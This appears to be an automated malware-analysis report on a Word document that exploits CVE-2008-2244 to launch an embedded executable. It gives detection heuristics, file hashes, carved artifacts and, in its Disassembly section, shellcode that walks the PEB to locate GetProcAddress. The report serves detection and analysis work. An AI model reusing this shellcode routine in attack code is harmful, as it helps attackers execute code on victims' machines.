MALICIOUS
410
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample is a Microsoft Word document that exploits CVE-2008-2244 to execute an embedded PE executable. The VBA macro is minimal and does not appear to contain malicious logic itself, but the embedded executable is the primary payload. The document body content is unrelated to the malicious functionality.
Heuristics 11
-
CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
-
ClamAV: Win.Exploit.MS03-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Exploit.MS03-1
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly000019A5 648b1530000000 mov edx, dword ptr fs:[0x30] 000019AC e9df020000 jmp 0x1c90 000019B1 8f85c4feffff pop dword ptr [ebp - 0x13c] 000019B7 8b420c mov eax, dword ptr [edx + 0xc] 000019BA 8b701c mov esi, dword ptr [eax + 0x1c] 000019BD ad lodsd eax, dword ptr [esi] 000019BE 8b7808 mov edi, dword ptr [eax + 8] 000019C1 89bdccfeffff mov dword ptr [ebp - 0x134], edi 000019C7 8b473c mov eax, dword ptr [edi + 0x3c] 000019CA 8b540778 mov edx, dword ptr [edi + eax + 0x78] 000019CE 03d7 add edx, edi 000019D0 8b5a20 mov ebx, dword ptr [edx + 0x20] 000019D3 03df add ebx, edi 000019D5 33c9 xor ecx, ecx 000019D7 41 inc ecx 000019D8 8b348b mov esi, dword ptr [ebx + ecx*4] 000019DB 03f7 add esi, edi 000019DD b847657450 mov eax, 0x50746547 000019E2 3b06 cmp eax, dword ptr [esi] 000019E4 75f1 jne 0x19d7 000019E6 b8726f6341 mov eax, 0x41636f72 000019EB 3b4604 cmp eax, dword ptr [esi + 4] 000019EE 75e7 jne 0x19d7 000019F0 8b5a24 mov ebx, dword ptr [edx + 0x24] 000019F3 03df add ebx, edi 000019F5 668b0c4b mov cx, word ptr [ebx + ecx*2] 000019F9 8b5a1c mov ebx, dword ptr [edx + 0x1c] 000019FC 03df add ebx, edi 000019FE 8b048b mov eax, dword ptr [ebx + ecx*4] 00001A01 03c7 add eax, edi 00001A03 89 .byte 0x89 00001A04 85 .byte 0x85
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 48,710 bytes but its declared streams total only 21,777 bytes — 26,933 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
VBA project contains no executable statements low OLE_VBA_MACROSDocument contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 369 bytes |
SHA-256: 0a0073e6700d52a50d0c1e9ea0537e97be4dbdf563f1ead10aa7aa70adf4375d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "PropertyTreeCtl1, 0, 0, PROPERTYTREELib, PropertyTreeCtl" |
|||
embedded_office_00006a00.exe |
embedded-pe | Office MZ+PE at offset 0x6A00 | 21574 bytes |
SHA-256: 9cacee6c891d8ac59e2e7896a746b8da8e66221d5039696f804d5a36ea10b65e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.61, consistent with packed or encrypted content.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.